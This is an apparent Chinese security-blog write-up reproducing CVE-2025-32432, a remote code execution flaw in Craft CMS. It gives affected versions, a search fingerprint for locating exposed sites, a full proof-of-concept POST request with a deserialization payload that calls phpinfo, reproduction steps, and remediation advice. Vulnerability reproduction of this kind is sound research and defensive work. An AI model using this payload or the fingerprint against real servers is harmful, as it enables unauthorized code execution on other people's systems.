漏洞复现篇 | CraftCMS 任意命令执行漏洞,CVE-2025-32432

admin 2025年5月5日19:39:32漏洞复现篇 | CraftCMS 任意命令执行漏洞,CVE-2025-32432已关闭评论78 views字数 2710阅读9分2秒阅读模式
漏洞复现篇 | CraftCMS 任意命令执行漏洞,CVE-2025-32432

免责声明!

公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法

大 纲

0x01 漏洞概述

0x02 影响范围

0x03 资产测绘

0x04 漏洞利用及复现过程

0x05 修复方案

0x01 漏洞概述

Craft CMS是一个开源的内容管理系统,它专注于用户友好的内容创建过程,逻辑清晰明了,是一个高度自由,高度自定义设计的平台吗,可以用来创建个人或企业网站也可以搭建企业级电子商务系统。

0x02 影响范围

3.0.0-RC1 <= Craft <= 3.9.15
4.0.0-RC1 <= Craft <= 4.14.15
5.0.0-RC1 <= Craft <= 5.6.17

0x03 资产测绘

header="X-Powered-By: Craft CMS" || banner="X-Powered-By: Craft CMS"
漏洞复现篇 | CraftCMS 任意命令执行漏洞,CVE-2025-32432

0x04 漏洞利用及复现过程

触发的POC:
POST /
            index.php?p=admin/actions/assets/generate-transform
           HTTP/1.1Host: 
            xxx.xxx.xxx.xxx
          Cookie: CRAFT_CSRF_TOKEN=daf6b64e2d0beca2810a1f2ba142ace3635bff363e262e10ebaa4e82b0fe9a4aa%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A40%3A%22jvyEd4GLStsd2iruHCZ_pgYXRkKWNLFc3_aWQX1q%22%3B%7DContent-Type: application/jsonAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Csrf-Token: bzFvT_mLmqlXm01ioxrWVQ3upJAehcZVaB5aNy52BVwY0mEZ_owjMwVHFgqdv93lBO8-BpFzpCBFrf7PbuKfDTp1EWBgOkM_K40ATq_UEkI=Content-Length: 217{"assetId":11,"handle":{"width":123,"height":123,"as session":{"class":"craft\\behaviors\\FieldLayoutBehavior","__class":"GuzzleHttp\\Psr7\\FnStream","__construct()":[[]],"_fn_close":"phpinfo"}},"9qsccmw8lve":"="}
复现过程:

S1:抓取
xxx.xxx.xxx.xxx/

index.php?p=admin/actions/assets/generate-transform数据包:

S2:获取CRAFT_CSRF_TOKEN:

漏洞复现篇 | CraftCMS 任意命令执行漏洞,CVE-2025-32432

S3:获取X-Csrf-Token:

漏洞复现篇 | CraftCMS 任意命令执行漏洞,CVE-2025-32432

S4:构造payload:

{"assetId":11,"handle":{"width":123,"height":123,"as session":{"class":"craft\\behaviors\\FieldLayoutBehavior","__class":"GuzzleHttp\\Psr7\\FnStream","__construct()":[[]],"_fn_close":"phpinfo"}},"9qsccmw8lve":"="}
漏洞复现篇 | CraftCMS 任意命令执行漏洞,CVE-2025-32432
S5:复现成功:
漏洞复现篇 | CraftCMS 任意命令执行漏洞,CVE-2025-32432

0x05 修复建议

  • 重置安全密钥(php craft setup/security-key)。
  • 轮换数据库凭证及API密钥,强制所有用户修改密码。
  • 在防火墙拦截包含“__class”POST请求。
  • 安装官方临时补丁库“Craft CMS Security Patches”
  • 立即升级,安装官方安全版本(3.9.154.14.155.6.17)。

CVE-2025-324322025年迄今影响最广泛的CMS漏洞之一,其低攻击门槛与高危害性已引发全球安全团队高度警戒。Craft CMS用户需立即行动,避免成为下一批受害者。

关注并私信进社群获取POC!

漏洞复现篇 | CraftCMS 任意命令执行漏洞,CVE-2025-32432
漏洞复现篇 | CraftCMS 任意命令执行漏洞,CVE-2025-32432

没看够~?欢迎关注!

往期精彩推荐

工具篇 | 超绝!漏洞盒子一键自动提交脚本,效率飞升秘籍

内网篇 |【干货】探秘高版本系统:密码抓取技术与方法解析,建议收藏!!!

面试篇 | 网安春招大厂面试题精选:看这一篇就够了,必看!!!(2)

工具篇 | 热点!AI赋能网安技术:一文解锁全新操作方式

面试篇 | 网安春招大厂面试题精选:看这一篇就够了,必看!!!(1)

工具篇 | MuMu模拟器安装证书+burpsuite抓包,APP&小程序渗透必备!!!

内网篇 | 巧妙使用CDN隐藏CobaltStrike特征,红队必备!!!

内网篇 | 干货!一文秒懂Kerberos认证:全面剖析与实践指南

内网篇 | CobaltStrike:深入探索本地信息收集技巧,干货!!!

漏洞复现篇 | Vite任意文件读取漏洞:CVE-2025-30208,最新!

Web篇 |【全网最详细】Apache CC反序列化漏洞:CC1调用链POC构造过程,干货!!!(上)

工具篇 | 应急响应工具包,2025Hvv必备神器!!!

Web篇 | 一文掌握Apache Commons Collections反序列化漏洞,速看!!!(上)

Web篇 | 一文掌握Java反序列化漏洞,干货!(上)

工具篇 | 把deepseek塞进微信:实现自动回复消息!王炸!!!

内网篇 | 【送给小白的】内网信息收集:端口扫描详解,干货!!!

漏洞复现篇 | CVE-2025-24813 Tomcat,最新RCE漏洞,速看!!!

内网篇 | 史上最全的内网IP扫描攻略,干货!

内网篇 | 干货!深入解析NTLM协议:挑战-响应认证机制揭秘,红队必备!

SRC篇 | 今天你挖洞了吗?Webpack未授权访问漏洞,实战!

Web篇 | 最强sqlmap联动burpsuite+WAF绕过姿势,Hvv面试必备!

红队必备:一文教你掌握pwd抓取技术,让你秒变高手!

SRC篇 | 如此简单的逻辑漏洞,速看!!!

内网篇 | 干货!Windows系统本地认证

漏洞复现篇 | Ecshop SQL注入引起的任意代码执行漏洞

Web篇 | 技巧!布尔盲注-利用burpsuite实现半自动化

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月5日19:39:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现篇 | CraftCMS 任意命令执行漏洞,CVE-2025-32432https://cn-sec.com/archives/4030053.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.